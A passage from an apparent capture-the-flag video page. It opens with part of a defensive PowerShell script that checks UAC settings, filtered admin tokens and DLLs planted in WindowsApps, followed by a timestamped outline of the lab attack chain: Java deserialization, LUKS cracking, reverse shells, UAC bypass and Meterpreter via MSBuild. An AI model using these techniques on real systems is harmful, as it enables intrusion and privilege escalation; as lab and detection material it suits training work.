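    [pscustomobject]@{
        EnableLUA                  = $p.EnableLUA
        ConsentPromptBehaviorAdmin = $p.ConsentPromptBehaviorAdmin
        PromptOnSecureDesktop      = $p.PromptOnSecureDesktop
        AlwaysNotify               = ($p.EnableLUA -eq 1 -and
                                      $p.ConsentPromptBehaviorAdmin -eq 2 -and
                                      $p.PromptOnSecureDesktop -eq 1)
    }
}

function Find-DllsInWindowsApps {
    # The loader's last probe location for srrstr.dll is the per-user WindowsApps
    # folder, which the user can write to. It normally holds only app execution
    # aliases, so any DLL in it deserves a look; report its Authenticode status.
    Get-Item 'C:\Users\*\AppData\Local\Microsoft\WindowsApps' -ErrorAction SilentlyContinue |
        ForEach-Object {
            Get-ChildItem -Path $_.FullName -Filter '*.dll' -File -ErrorAction SilentlyContinue
        } |
        Select-Object FullName, Length, LastWriteTime,
            @{ Name = 'Signature'; Expression = { (Get-AuthenticodeSignature -FilePath $_.FullName).Status } }
}

function Test-FilteredAdminToken {
    # On a UAC-filtered token, whoami /all lists BUILTIN\Administrators as
    # "Group used for deny only", so IsInRole(Administrator) is false even though
    # the account is a member of the local Administrators group.
    $id        = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = [Security.Principal.WindowsPrincipal]$id
    $adminSid  = [Security.Principal.SecurityIdentifier]'S-1-5-32-544'
    $member    = (Get-LocalGroupMember -SID $adminSid -ErrorAction SilentlyContinue).SID -contains $id.User
    $elevated  = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
    [pscustomobject]@{
        User                   = $id.Name
        MemberOfAdministrators = $member
        Elevated               = $elevated
        FilteredByUac          = ($member -and -not $elevated)
        LanguageMode           = $ExecutionContext.SessionState.LanguageMode
    }
}

Get-UacPosture
Test-FilteredAdminToken
Find-DllsInWindowsApps
```

Run this from a normal FullLanguage PowerShell session (the .NET type calls it uses are exactly the ones ConstrainedLanguage mode blocks, as the video saw with New-Object Net.WebClient). AlwaysNotify coming back False means auto-elevating binaries on the host will still elevate silently for a filtered administrator; any DLL reported under WindowsApps is a finding until its origin is explained, since nothing legitimate installs libraries there.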

Original Description

00:55 - Begin of Recon
02:20 - Checking the WebPages
03:50 - Examining /userSubscribe.faces, to discover potential deserialization
05:00 - Exploring javax.faces.ViewState
05:50 - Googling around to see what an unencrypted serialized object should look like
07:15 - Checking out SMB to discover an open share
09:00 - Downloading appserver.zip from batshare via smbclient
11:00 - Cracking a LUKS encrypted file with dd and hashcat
14:00 - LUKS cracked, mounting the disk with luksOpen
16:20 - Discovery of the secret used to encrypt the Java object
18:10 - Creating a Python script to decrypt the ViewState to verify we have correct crypto settings
23:10 - Script completed, let's test the decryption!
24:15 - Downloading ysoserial to create a deserialization CommonsCollections gadget
26:00 - Creating a Python script to exploit the deserialization vuln
31:00 - Script complete! We got a ping, testing the MyFaces serialization objects (did not work)
33:00 - Modifying the script to run commands other than what ysoserial provided
41:10 - Script updates finished, trying to get a reverse shell via nishang (did not work)
42:40 - Trying Invoke-WebRequest, because Net.WebClient did not work (testing for constrained mode)
45:00 - Downloading netcat to upload to the box
46:00 - Netcat returned a PowerShell reverse shell
47:20 - Discovering Backup.zip, downloading, using readpst to convert it to a plaintext mbox file
50:00 - Using Evolution to view mbox file and find Batman's password
52:45 - Using PowerShell's Invoke-Command to execute commands as Batman (like runas)
55:40 - Reverse shell as Batman returned! Running a few commands to find out he is local admin but needs to break out of UAC
58:10 - Unintended: Using net use to mount c$ and view the flag
59:30 - Checking GitHub hfiref0x/UACME to find a UAC bypass. Chose one by a fellow HTB member
01:02:10 - Using GreatSCT/MSBuild to launch Meterpreter
01:02:45 - While GreatSCT installs, create a DLL to return a reverse shell
01:06:00 - c

This video teaches how to exploit Java deserialization vulnerabilities using Burp Suite and Python, and how to bypass UAC using Metasploit and meterpreter. It also covers post-exploitation techniques and the use of msbuild for payload execution.

Key Takeaways
  1. Run gobuster to brute-force for potential vulnerabilities
  2. Use Burp Suite to intercept and analyze HTTP requests
  3. Identify Java deserialization vulnerabilities
  4. Exploit Java deserialization vulnerabilities using Python
  5. Bypass UAC using Metasploit and meterpreter
  6. Use msbuild to execute payload
  7. Migrate to a new process using meterpreter
💡 The video highlights the importance of identifying and exploiting Java deserialization vulnerabilities, and demonstrates how to use tools like Burp Suite and Python to achieve this.
